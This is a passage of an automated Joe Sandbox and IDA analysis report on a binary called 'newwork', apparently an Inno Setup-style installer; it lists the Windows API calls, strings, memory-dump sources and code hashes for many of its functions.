                                                                                        • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                        • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                        • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                        • API String ID: 613034392-3771334282
                                                                                        • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                        • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                        • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                        • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                        Strings
                                                                                        • Fusion.dll, xrefs: 004597DF
                                                                                        • CreateAssemblyCache, xrefs: 00459836
                                                                                        • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                        • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                        • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                        • API String ID: 190572456-3990135632
                                                                                        • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                        • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                        • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                        • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                        APIs
                                                                                          • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                        • GetFocus.USER32 ref: 0041C168
                                                                                        • GetDC.USER32(?), ref: 0041C174
                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                        • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                        • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                        • String ID:
                                                                                        • API String ID: 3303097818-0
                                                                                        • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                        • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                        • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                        • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                        • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                        • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                          • Part of subcall function 004107F8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                        • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                        • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                        • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                        • 6F530860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$C400C740F530860F532980
                                                                                        • String ID:
                                                                                        • API String ID: 209721339-0
                                                                                        • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                        • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                        • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                        • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                        • API String ID: 47109696-2530820420
                                                                                        • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                        • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                        • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                        • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                        APIs
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$Delete$Stretch
                                                                                        • String ID:
                                                                                        • API String ID: 1458357782-0
                                                                                        • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                        • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                        • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                        • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00495519
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                        • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                        Strings
                                                                                        • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                        • API String ID: 2948443157-222967699
                                                                                        • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                        • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                        • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                        • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                        APIs
                                                                                        • GetCursorPos.USER32 ref: 004233AF
                                                                                        • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                        • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                        • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                        • SetCursor.USER32(00000000), ref: 00423413
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1770779139-0
                                                                                        • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                        • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                        • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                        • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                        • API String ID: 667068680-2254406584
                                                                                        • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                        • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                        • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                        • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                        • API String ID: 190572456-212574377
                                                                                        • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                        • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                        • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                        • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                        • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                          • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                          • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                          • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                        • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                        • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                        • API String ID: 142928637-2676053874
                                                                                        • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                        • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                        • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                        • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                        • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                        • API String ID: 2238633743-1050967733
                                                                                        • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                        • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                        • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                        • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                        • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                        • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                        • API String ID: 667068680-222143506
                                                                                        • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                        • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                        • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                        • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041B57E
                                                                                        • GetDC.USER32(?), ref: 0041B58A
                                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                        • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2502006586-0
                                                                                        • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                        • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                        • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                        • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                        APIs
                                                                                        • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                        • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
